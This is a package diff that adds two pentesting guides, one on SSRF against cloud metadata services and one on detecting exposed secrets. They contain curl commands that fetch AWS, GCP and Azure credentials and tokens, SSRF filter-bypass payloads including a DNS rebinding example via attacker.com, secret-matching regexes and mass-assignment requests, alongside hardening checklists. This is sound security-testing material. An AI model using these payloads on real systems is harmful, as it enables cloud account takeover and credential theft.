@soulofzephir/pi-skill-pentesting 1.0.2 โ†’ 1.0.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,290 @@
1
+ # Cloud Metadata Service Security
2
+
3
+ ## ๐Ÿ” What is Cloud Metadata?
4
+
5
+ Cloud providers expose instance metadata at a well-known IP address. This can contain sensitive information including credentials!
6
+
7
+ ---
8
+
9
+ ## โš ๏ธ CRITICAL: Metadata Endpoints
10
+
11
+ ### AWS EC2
12
+ ```
13
+ http://169.254.169.254/ (latest)
14
+ http://169.254.169.254/2009-04-04/ (specific version)
15
+ http://169.254.169.254/latest/meta-data/
16
+ http://169.254.169.254/latest/user-data/
17
+ ```
18
+
19
+ ### Google Cloud Platform (GCP)
20
+ ```
21
+ http://metadata.google.internal/computeMetadata/v1/
22
+ http://metadata.google.internal/computeMetadata/v1/instance/
23
+ http://metadata.google.internal/computeMetadata/v1/project/
24
+ ```
25
+
26
+ ### Microsoft Azure
27
+ ```
28
+ http://169.254.169.254/metadata/instance
29
+ http://169.254.169.254/metadata/instance?api-version=2021-02-01
30
+ ```
31
+
32
+ ### DigitalOcean
33
+ ```
34
+ http://169.254.169.254/metadata/v1/
35
+ http://169.254.169.254/metadata/v1.json
36
+ ```
37
+
38
+ ---
39
+
40
+ ## โš ๏ธ SSRF to Cloud Metadata - CRITICAL
41
+
42
+ **Attack Vector:**
43
+ ```
44
+ Attacker finds SSRF vulnerability
45
+ โ†“
46
+ Forces application to request metadata endpoint
47
+ โ†“
48
+ Steals cloud credentials
49
+ โ†“
50
+ Full cloud account compromise!
51
+ ```
52
+
53
+ ---
54
+
55
+ ## ๐Ÿงช Testing Checklist
56
+
57
+ ### Phase 1: SSRF Detection
58
+ - [ ] URL parameters tested (url, src, dest, redirect, uri, path)
59
+ - [ ] POST body parameters tested
60
+ - [ ] HTTP headers tested (Referer, X-Forwarded-For)
61
+ - [ ] File upload (path traversal in filename)
62
+ - [ ] SVG upload (XXE)
63
+ - [ ] XML parsers (XXE)
64
+
65
+ ### Phase 2: Metadata Endpoint Access
66
+ - [ ] AWS metadata accessible?
67
+ - [ ] GCP metadata accessible?
68
+ - [ ] Azure metadata accessible?
69
+ - [ ] DigitalOcean metadata accessible?
70
+ - [ ] Alibaba Cloud metadata accessible?
71
+
72
+ ### Phase 3: Metadata Data Exposed
73
+ - [ ] Instance ID exposed
74
+ - [ ] IAM credentials exposed (AWS role)
75
+ - [ ] IAM token exposed
76
+ - [ ] User data exposed (often contains scripts/config)
77
+ - [ ] SSH keys exposed (GCP)
78
+ - [ ] Service account tokens exposed (GCP)
79
+
80
+ ### Phase 4: Credential Exploitation
81
+ - [ ] IAM role can be assumed
82
+ - [ ] AWS CLI configured with stolen credentials
83
+ - [ ] S3 buckets accessible
84
+ - [ ] Other AWS services accessible
85
+
86
+ ---
87
+
88
+ ## ๐Ÿ”ง Testing Commands
89
+
90
+ ### AWS Metadata Check
91
+ ```bash
92
+ # Basic metadata access
93
+ curl http://169.254.169.254/latest/meta-data/
94
+ curl http://169.254.169.254/latest/user-data/
95
+
96
+ # IAM credentials (if vulnerable)
97
+ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
98
+ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
99
+
100
+ # Get token (newer versions)
101
+ curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token: true"
102
+ ```
103
+
104
+ ### GCP Metadata Check
105
+ ```bash
106
+ # Must include header
107
+ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/
108
+
109
+ # Instance info
110
+ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/id
111
+
112
+ # Service account
113
+ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
114
+
115
+ # Access token (if vulnerable!)
116
+ curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
117
+ ```
118
+
119
+ ### Azure Metadata Check
120
+ ```bash
121
+ # Requires API version
122
+ curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
123
+
124
+ # Managed identity token
125
+ curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com"
126
+ ```
127
+
128
+ ### DigitalOcean Metadata
129
+ ```bash
130
+ curl http://169.254.169.254/metadata/v1.json
131
+ curl http://169.254.169.254/metadata/v1/user-data
132
+ ```
133
+
134
+ ---
135
+
136
+ ## ๐Ÿ”ง SSRF Payloads for Metadata
137
+
138
+ ### Basic
139
+ ```
140
+ http://169.254.169.254/
141
+ http://169.254.169.254/latest/meta-data/
142
+ http://169.254.169.254/latest/user-data/
143
+ ```
144
+
145
+ ### With Headers
146
+ ```bash
147
+ # AWS - get token first
148
+ curl -X PUT -H "X-aws-ec2-metadata-token: anything" http://target.com/url?param=http://169.254.169.254/latest/meta-data/
149
+
150
+ # GCP - require header
151
+ curl -H "Metadata-Flavor: Google" http://target.com/url?param=http://metadata.google.internal/
152
+ ```
153
+
154
+ ### Bypass Filters
155
+ ```bash
156
+ # IP encoding
157
+ http://127.0.0.1
158
+ http://2130706433 (decimal)
159
+ http://0x7f000001 (hex)
160
+ http://[::1]
161
+
162
+ # URL encoding
163
+ http://169.254.169.254 โ†’ http://%31%36%39.%32%35%34.%31%36%39.%32%35%34
164
+
165
+ # DNS rebinding
166
+ http://attacker.com -> points to 169.254.169.254
167
+
168
+ # Open redirect
169
+ http://target.com/redirect?url=http://169.254.169.254/
170
+ ```
171
+
172
+ ---
173
+
174
+ ## ๐Ÿ“‹ SSRF Test Parameters
175
+
176
+ Common parameter names to test:
177
+ ```
178
+ url
179
+ src
180
+ source
181
+ uri
182
+ link
183
+ redirect
184
+ path
185
+ continue
186
+ url
187
+ window
188
+ next
189
+ data
190
+ reference
191
+ spider
192
+ baseUrl
193
+ xml
194
+ view
195
+ doc
196
+ site
197
+ html
198
+ feed
199
+ host
200
+ port
201
+ to
202
+ out
203
+ view
204
+ dir
205
+ show
206
+ navigation
207
+ open
208
+ file
209
+ val
210
+ validate
211
+ domain
212
+ callback
213
+ return
214
+ page
215
+ feed
216
+ host
217
+ pass
218
+ data
219
+ address
220
+ link
221
+ url
222
+ ```
223
+
224
+ ---
225
+
226
+ ## ๐Ÿ›ก๏ธ Cloud Metadata Protection Checklist
227
+
228
+ ### For Cloud Providers (Disable IMDS)
229
+ ```bash
230
+ # AWS - require IMDSv2
231
+ aws ec2 modify-instance-metadata-options \
232
+ --instance-id i-1234567890abcdef0 \
233
+ --http-tokens required \
234
+ --http-put-response-hop-limit 1
235
+
236
+ # GCP - disable via metadata server
237
+ # No direct disable, but use:
238
+ # - Service account with minimal permissions
239
+ # - No legacy endpoints
240
+ # - VPC firewall rules
241
+
242
+ # Azure
243
+ # Use IMDS with managed identity
244
+ # Restrict via firewall
245
+ ```
246
+
247
+ ### For Application Developers
248
+ - [ ] Validate all user input
249
+ - [ ] Use allowlist for URLs
250
+ - [ ] Block private IP ranges
251
+ - [ ] Disable unnecessary URL schemas
252
+ - [ ] Use security library (no direct URL fetching)
253
+ - [ ] Implement SSRF protection
254
+ - [ ] Log SSRF attempts
255
+
256
+ ### For Cloud Security
257
+ - [ ] Use IMDSv2 (AWS)
258
+ - [ ] Use service accounts with minimal privileges
259
+ - [ ] No long-lived credentials in instance metadata
260
+ - [ ] Regular audit of IAM roles
261
+ - [ ] Enable VPC endpoints
262
+ - [ ] Network segmentation
263
+
264
+ ---
265
+
266
+ ## ๐Ÿ“Š Risk Assessment
267
+
268
+ | Finding | Severity | CVSS |
269
+ |---------|----------|------|
270
+ | AWS metadata accessible | ๐Ÿ”ด CRITICAL | 10.0 |
271
+ | GCP service account token stolen | ๐Ÿ”ด CRITICAL | 10.0 |
272
+ | Azure managed identity exploited | ๐Ÿ”ด CRITICAL | 9.8 |
273
+ | Arbitrary file read (metadata) | ๐Ÿ”ด CRITICAL | 9.8 |
274
+ | SSRF without credentials | ๐ŸŸ  HIGH | 8.6 |
275
+
276
+ ---
277
+
278
+ ## ๐Ÿšจ Real-World Impact
279
+
280
+ ```
281
+ 1. Attacker finds SSRF in web app
282
+ 2. Attacker requests AWS metadata
283
+ 3. Attacker steals IAM credentials
284
+ 4. Attacker assumes admin role
285
+ 5. Attacker has full AWS access
286
+ 6. Attacker exfiltrates all data
287
+ 7. Attacker creates backdoor
288
+ ```
289
+
290
+ **Prevention:** Always assume SSRF exists, protect metadata endpoints!
@@ -0,0 +1,323 @@
1
+ # Sensitive Data Exposure Detection
2
+
3
+ ## ๐Ÿ” What is Sensitive Data?
4
+
5
+ Data that must be protected from unauthorized access:
6
+ - Personal Identifiable Information (PII)
7
+ - Financial data
8
+ - Authentication credentials
9
+ - Healthcare information
10
+ - Business secrets
11
+
12
+ ---
13
+
14
+ ## โš ๏ธ Common Sources of Data Exposure
15
+
16
+ ### 1. Source Code Exposure
17
+ ```
18
+ .git/ directory
19
+ _backup.zip
20
+ *.bak
21
+ *.swp
22
+ *.tmp
23
+ ```
24
+
25
+ ### 2. Configuration Files
26
+ ```
27
+ .env
28
+ config.php
29
+ wp-config.php
30
+ settings.py
31
+ application.properties
32
+ ```
33
+
34
+ ### 3. API Responses
35
+ ```
36
+ Excessive data exposure
37
+ Missing field filtering
38
+ Debug responses
39
+ ```
40
+
41
+ ### 4. Client-Side Data
42
+ ```
43
+ JavaScript source maps
44
+ localStorage/sessionStorage
45
+ Cookies
46
+ URL parameters
47
+ ```
48
+
49
+ ---
50
+
51
+ ## ๐Ÿงช Testing Checklist
52
+
53
+ ### Phase 1: Sensitive Files
54
+ - [ ] `.env` files exposed
55
+ - [ ] `.git/` directory accessible
56
+ - [ ] Backup files exposed
57
+ - [ ] Configuration files accessible
58
+ - [ ] Database dumps exposed
59
+
60
+ ### Phase 2: Source Code
61
+ - [ ] Source maps (.map) exposed
62
+ - [ ] JavaScript source code analyzed
63
+ - [ ] Debug endpoints accessible
64
+ - [ ] Swagger/OpenAPI docs exposed
65
+ - [ ] Internal paths in JS
66
+
67
+ ### Phase 3: API Responses
68
+ - [ ] Full data returned vs needed
69
+ - [ ] Hidden fields in JSON
70
+ - [ ] Passwords in responses
71
+ - [ ] Internal IDs exposed
72
+ - [ ] Stack traces in errors
73
+
74
+ ### Phase 4: Client Storage
75
+ - [ ] Sensitive data in localStorage
76
+ - [ ] Sensitive data in sessionStorage
77
+ - [ ] Sensitive data in cookies
78
+ - [ ] Sensitive data in URL
79
+ - [ ] Browser history
80
+
81
+ ### Phase 5: Credentials Detection
82
+ - [ ] API keys in source code
83
+ - [ ] AWS credentials in source
84
+ - [ ] Private keys exposed
85
+ - [ ] Database passwords
86
+ - [ ] JWT tokens
87
+
88
+ ### Phase 6: PII Exposure
89
+ - [ ] Email addresses
90
+ - [ ] Phone numbers
91
+ - [ ] Physical addresses
92
+ - [ ] Social security numbers
93
+ - [ ] Dates of birth
94
+
95
+ ---
96
+
97
+ ## ๐Ÿ”ง Detection Tools
98
+
99
+ ### grep for Secrets
100
+ ```bash
101
+ # Search for API keys
102
+ grep -r "api_key\|apikey\|api-key" . --include="*.js" --include="*.json"
103
+ grep -r "aws_access_key\|aws_secret" . --include="*.py" --include="*.js"
104
+ grep -r "password\|pwd\|pass" . --include="*.js" --include="*.json"
105
+
106
+ # Search for tokens
107
+ grep -r "token\|bearer\|authorization" . --include="*.js" --include="*.json"
108
+
109
+ # Search for private keys
110
+ grep -r "BEGIN RSA PRIVATE KEY\|BEGIN PRIVATE KEY" .
111
+ ```
112
+
113
+ ### trufflehog (Secrets Scanner)
114
+ ```bash
115
+ # Scan git repo
116
+ trufflehog git https://github.com/target/repo.git
117
+
118
+ # Scan filesystem
119
+ trufflehog filesystem .
120
+
121
+ # Scan S3 bucket
122
+ trufflehog s3 --bucket=bucket-name
123
+
124
+ # Scan GitHub org
125
+ trufflehog github --org=target-org
126
+ ```
127
+
128
+ ### gitrob (GitHub Recon)
129
+ ```bash
130
+ gitrob target --no-gist
131
+ ```
132
+
133
+ ### gitleaks (Secret Scanner)
134
+ ```bash
135
+ # Scan repo
136
+ gitleaks detect --source .
137
+
138
+ # Scan with config
139
+ gitleaks detect --source . --config gitleaks.toml
140
+ ```
141
+
142
+ ### shhgit (Real-time GitHub Scanning)
143
+ ```bash
144
+ shhgit -domain github.com -search-keyword "target"
145
+ ```
146
+
147
+ ---
148
+
149
+ ## ๐Ÿ”ง Pattern Detection
150
+
151
+ ### API Keys & Tokens
152
+ ```
153
+ AKIA[0-9A-Z]{16} โ†’ AWS Access Key
154
+ [0-9a-zA-Z+/]{40} โ†’ AWS Secret Key (base64)
155
+ AIza[0-9A-Za-z_-]{35} โ†’ Google API Key
156
+ sk_live_[0-9a-z]{24,32} โ†’ Stripe
157
+ sk_test_[0-9a-z]{24,32} โ†’ Stripe Test
158
+ ghp_[0-9a-zA-Z]{36} โ†’ GitHub Personal Access Token
159
+ xox[baprs]-[0-9a-zA-Z]{10,} โ†’ Slack Token
160
+ ```
161
+
162
+ ### Password Patterns
163
+ ```
164
+ password=.*
165
+ pwd=.*
166
+ pass=.*
167
+ secret=.*
168
+ credential=.*
169
+ ```
170
+
171
+ ### Private Keys
172
+ ```
173
+ -----BEGIN RSA PRIVATE KEY-----
174
+ -----BEGIN EC PRIVATE KEY-----
175
+ -----BEGIN PRIVATE KEY-----
176
+ -----BEGIN OPENSSH PRIVATE KEY-----
177
+ ```
178
+
179
+ ### JWT Tokens
180
+ ```
181
+ eyJ[0-9A-Za-z_-]*\.eyJ[0-9A-Za-z_-]*\.[0-9A-Za-z_-]*
182
+ ```
183
+
184
+ ---
185
+
186
+ ## ๐Ÿ”ง File Patterns to Check
187
+
188
+ ```bash
189
+ # Configuration
190
+ find . -name ".env*" -o -name "*.config*" -o -name "config.*"
191
+ find . -name "*.php" -o -name "*.py" -o -name "*.js"
192
+
193
+ # Backups
194
+ find . -name "*.bak" -o -name "*.backup" -o -name "*.old"
195
+ find . -name "*.zip" -o -name "*.tar" -o -name "*.tar.gz"
196
+
197
+ # Source control
198
+ find . -name ".git" -type d
199
+ find . -name ".svn" -type d
200
+
201
+ # Keys
202
+ find . -name "*.pem" -o -name "*.key" -o -name "*.p12"
203
+ ```
204
+
205
+ ---
206
+
207
+ ## ๐Ÿ“‹ Data Classification
208
+
209
+ | Type | Sensitivity | Examples |
210
+ |------|------------|----------|
211
+ | ๐Ÿ”ด Critical | Highest | Passwords, Private Keys, SSN |
212
+ | ๐ŸŸ  High | High | API Keys, Tokens, Credit Cards |
213
+ | ๐ŸŸก Medium | Medium | Email, Phone, Addresses |
214
+ | ๐ŸŸข Low | Low | Public data |
215
+
216
+ ---
217
+
218
+ ## ๐Ÿ› ๏ธ API Response Analysis
219
+
220
+ ### Test for Excessive Data
221
+ ```bash
222
+ # Get user profile - should only return needed fields
223
+ curl -X GET /api/user/123
224
+
225
+ # Check if returns:
226
+ # - Password hash
227
+ # - Internal IDs
228
+ # - Debug info
229
+ # - Other users' data
230
+ ```
231
+
232
+ ### Test for Hidden Fields
233
+ ```html
234
+ <!-- Check HTML forms for hidden inputs -->
235
+ <input type="hidden" name="admin" value="true">
236
+ <input type="hidden" name="role" value="user">
237
+
238
+ # Change hidden field values
239
+ curl -X POST /api/update -d "role=admin" -d "user_id=123"
240
+ ```
241
+
242
+ ### Test for Mass Assignment
243
+ ```bash
244
+ # Try adding extra fields
245
+ curl -X POST /api/user -d "name=test&email=test@test.com&admin=true"
246
+ curl -X PUT /api/user/123 -d "balance=1000&admin=true"
247
+ ```
248
+
249
+ ---
250
+
251
+ ## ๐Ÿ“Š Exposure Risk Matrix
252
+
253
+ | Exposure Type | Risk | CVSS |
254
+ |---------------|------|------|
255
+ | Database credentials | ๐Ÿ”ด CRITICAL | 9.8 |
256
+ | AWS keys exposed | ๐Ÿ”ด CRITICAL | 9.8 |
257
+ | Private keys | ๐Ÿ”ด CRITICAL | 9.8 |
258
+ | API keys exposed | ๐ŸŸ  HIGH | 7.5 |
259
+ | PII in logs | ๐ŸŸ  HIGH | 7.1 |
260
+ | Token in URL | ๐ŸŸก MEDIUM | 6.5 |
261
+ | Debug info | ๐ŸŸก MEDIUM | 5.3 |
262
+
263
+ ---
264
+
265
+ ## ๐Ÿ›ก๏ธ Prevention Checklist
266
+
267
+ ### Source Code
268
+ - [ ] .git/ blocked by web server
269
+ - [ ] No backup files in web root
270
+ - [ ] Source maps disabled in production
271
+ - [ ] No secrets in code
272
+
273
+ ### API Responses
274
+ - [ ] Only return needed fields
275
+ - [ ] No passwords/tokens in responses
276
+ - [ ] No internal IDs
277
+ - [ ] Error handling doesn't leak info
278
+
279
+ ### Client Storage
280
+ - [ ] No sensitive data in localStorage
281
+ - [ ] Cookies HttpOnly + Secure
282
+ - [ ] No sensitive data in URL
283
+
284
+ ### Secrets Management
285
+ - [ ] Use environment variables
286
+ - [ ] Use secret management services
287
+ - [ ] Rotate secrets regularly
288
+ - [ ] No default passwords
289
+
290
+ ---
291
+
292
+ ## ๐Ÿ” Quick Scan Commands
293
+
294
+ ```bash
295
+ # Search for secrets in JS files
296
+ grep -rn "password\|api_key\|secret\|token" --include="*.js" .
297
+
298
+ # Check for exposed .env
299
+ curl -s target.com/.env | head -20
300
+
301
+ # Check for git directory
302
+ curl -s target.com/.git/config
303
+
304
+ # Check for backups
305
+ curl -s target.com/backup.zip -o /dev/null -w "%{http_code}"
306
+
307
+ # Check API response for sensitive data
308
+ curl -s /api/user/1 | jq 'keys'
309
+ ```
310
+
311
+ ---
312
+
313
+ ## ๐Ÿ“‹ Sensitive Data Checklist Summary
314
+
315
+ | Check | Status | Severity |
316
+ |-------|--------|----------|
317
+ | .env exposed | โ˜ | ๐Ÿ”ด CRITICAL |
318
+ | .git accessible | โ˜ | ๐Ÿ”ด CRITICAL |
319
+ | API keys in JS | โ˜ | ๐ŸŸ  HIGH |
320
+ | Passwords in response | โ˜ | ๐Ÿ”ด CRITICAL |
321
+ | PII exposed | โ˜ | ๐ŸŸ  HIGH |
322
+ | Token in URL | โ˜ | ๐ŸŸก MEDIUM |
323
+ | Debug mode | โ˜ | ๐ŸŸ  HIGH |